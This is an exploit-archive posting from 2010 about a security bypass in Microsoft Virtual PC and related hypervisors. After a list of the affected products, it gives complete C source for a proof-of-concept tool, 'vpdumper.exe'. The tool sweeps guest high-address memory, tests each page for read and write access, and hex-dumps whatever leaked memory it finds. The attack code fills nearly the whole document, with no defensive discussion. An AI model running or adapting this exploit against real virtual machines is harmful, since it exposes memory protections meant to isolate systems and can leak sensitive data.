Microsoft Virtual PC Hypervisor Virtual Machine Bypass Vulne
Posted on 17 March 2010
===================================================================================== Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability ===================================================================================== Vulnerable: Microsoft Windows Virtual PC 0 Microsoft Windows 7 XP Mode 0 Microsoft Virtual Server 2005 0 Microsoft Virtual PC 2007 SP1 Microsoft Virtual PC 2007 0 #include <windows.h> #include <stdio.h> #include <ctype.h> #define ROWS 16 void find_leaked_memory ( void ); void print_data ( unsigned int , char * , unsigned int ); int main ( void ) { /* message for users */ printf ( "n*********** vpdumper.exe ***********" ); printf ( "nCreated by Nicolas A. Economou ( neconomou@corest.com )" ); printf ( "nCore Security Technologies, Buenos Aires, Argentina ( 2010 )n" ); /* Search and Print leaked memory */ printf ( "nsearching leaked memoryn" ); find_leaked_memory (); return ( 1 ); } void find_leaked_memory ( void ) { char buffer [ 0x1000 ]; char *base; int r, w; /* search the high address memory area */ for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 ) { /* Dark Area */ if ( ( unsigned int ) base == 0xe839c000 ) { continue; } /* Inicialize flags */ r = FALSE; w = FALSE; /* check readable */ if ( IsBadReadPtr ( base , 1 ) == FALSE ) { /* set flag */ r = TRUE; } /* check writeable */ if ( IsBadWritePtr ( base , 1 ) == FALSE ) { /* set flag */ w = TRUE; } /* if readable or writeable */ if ( r == TRUE || w == TRUE ) { /* get contents into our buffer */ memcpy ( buffer , base , 0x1000 ); /* print page attributes */ printf ( "attributes: " ); printf ( "%s" , ( r == TRUE ) ? "R":"" ); printf ( "%s" , ( w == TRUE ) ? "W":"" ); printf ( "n" ); /* print the memory */ print_data ( ( unsigned int ) base , buffer , 0x1000 ); } } } void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir ) { unsigned int cont; unsigned int i; /* Imprimo las lineas encontradas */ for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS ) { /* Imprimo la direccion de la memoria */ printf ( "%.8x | " , direccion ); /* Incremento la direccion a mostrar */ direccion = direccion + ROWS; /* Imprimo en hexa */ for ( i = 0 ; i < ROWS ; i ++ ) { /* Imprimo la cantidad que pedi */ if ( i < ( bytes_a_imprimir - cont ) ) { printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] ); } else { printf ( " " ); } } /* Espacio entre las 2 columnas */ printf ( "| " ); /* Imprimo en caracteres */ for ( i = 0 ; i < ROWS ; i ++ ) { if ( i < ( bytes_a_imprimir - cont ) ) { printf ( "%c" , ( isgraph ( buffer [ i + cont ] ) ) ? buffer [ i + cont ] : '.' ); } else { printf ( " " ); } } /* Fin de linea */ printf ( "n" ); } } # ~ - [ [ : Inj3ct0r : ] ]